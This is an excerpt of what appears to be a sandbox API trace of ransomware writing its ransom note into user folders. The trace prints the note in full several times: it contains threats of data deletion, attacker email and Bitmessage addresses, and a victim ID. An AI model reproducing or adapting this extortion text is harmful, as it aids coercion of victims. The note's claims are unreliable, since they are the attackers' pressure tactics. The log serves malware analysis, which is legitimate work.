s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.795] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.796] CloseHandle (hObject=0x284) returned 1 [0269.796] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0269.796] GetLastError () returned 0x2 [0269.796] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 